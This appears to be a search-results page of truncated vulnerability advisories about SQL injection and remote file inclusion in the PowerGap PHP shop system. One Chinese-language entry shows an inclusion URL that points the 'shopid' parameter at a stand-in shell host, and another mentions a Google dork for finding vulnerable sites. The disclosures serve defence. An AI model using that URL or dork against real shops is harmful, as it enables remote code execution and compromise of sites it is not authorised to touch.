20 matches found
EUVD-2008-3547
Malware in sbrugna...
EUVD-2006-4226
Malware in sbrugna...
POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...
POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
PowerGap Shopsystem "ag" SQL注入漏洞
CNCAN ID:CNCAN-2008081110 PowerGap Shopsystem是一款基于PHP的WEB应用程序。 PowerGap Shopsystem不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息或操作数据库。 问题是由于's03.php'脚本不正确过滤"ag"参数,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,可获得敏感信息或操作数据库。 PowerGap Shopsystem 目前没有解决方案提供: http://www.powergap.de/shopsystem-powergap.htm...
CVE-2008-3561
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
Sql injection
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
CVE-2008-3561
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
CVE-2008-3561
The CVE-2008-3561 entry describes an SQL injection in Powergap Shopsystem via s03.php when magic_quotes_gpc is disabled. The vulnerable component is the ag parameter, enabling remote attackers to execute arbitrary SQL commands. Public sources (NVD, CVE listings) confirm the vulnerability and affe...
POWERGAP ShopSystem - s03.php SQL Injection
POWERGAP ShopSystem - s03.php SQL Injection source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attack...
powergap-sql.txt
=============================================== PowerGap Shopsystem SQL Injection =============================================== Title: : PowerGap Shopsystem SQL Injection - URL : www.powergap.de - Found : 23 Jul. 2008 - 13:07 - Author : Rohit Bansal - Google Dork : intext:c POWERGAP - Exploit: ...
POWERGAP ShopSystem - 's03.php' SQL Injection
source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or...
Powergap远程文件包含漏洞
Powergap是一款基于PHP的WEB应用程序。 Powergap不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是多个脚本对用户提交的'shopid'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Powergap Powergap Lite Powergap Powergap Busines http://www.powergap.de/ http://www.example.com/s01.php?shopid=http://SHELLURL.COM...
POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...
CVE-2006-4236
Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the 1 shopid parameter to a s01.php, b s02.php, c s03.php, and d s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATHINFO...
CVE-2006-4236
Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the 1 shopid parameter to a s01.php, b s02.php, c s03.php, and d s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATHINFO...
CVE-2006-4236
The CVE-2006-4236 entry describes multiple PHP remote file inclusion vulnerabilities in POWERGAP. An attacker can craft a URL using the shopid parameter (to s01.php, s02.php, s03.php, or s04.php) or manipulate PATH_INFO after shopid= or sid= to cause arbitrary PHP code execution on affected POWER...
powergap <= (s0x.php) Remote File Inclusion
================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ | Critical Level : Dangerous | | Venedor site : http://www.powergap-shop.de | | http://www.demo-shop.com | |...
POWERGAP 2003 - s0x.php Remote File Inclusion
POWERGAP 2003 - s0x.php Remote File Inclusion ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...
POWERGAP 2003 - 's0x.php' Remote File Inclusion
================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de http://www.demo-shop.com...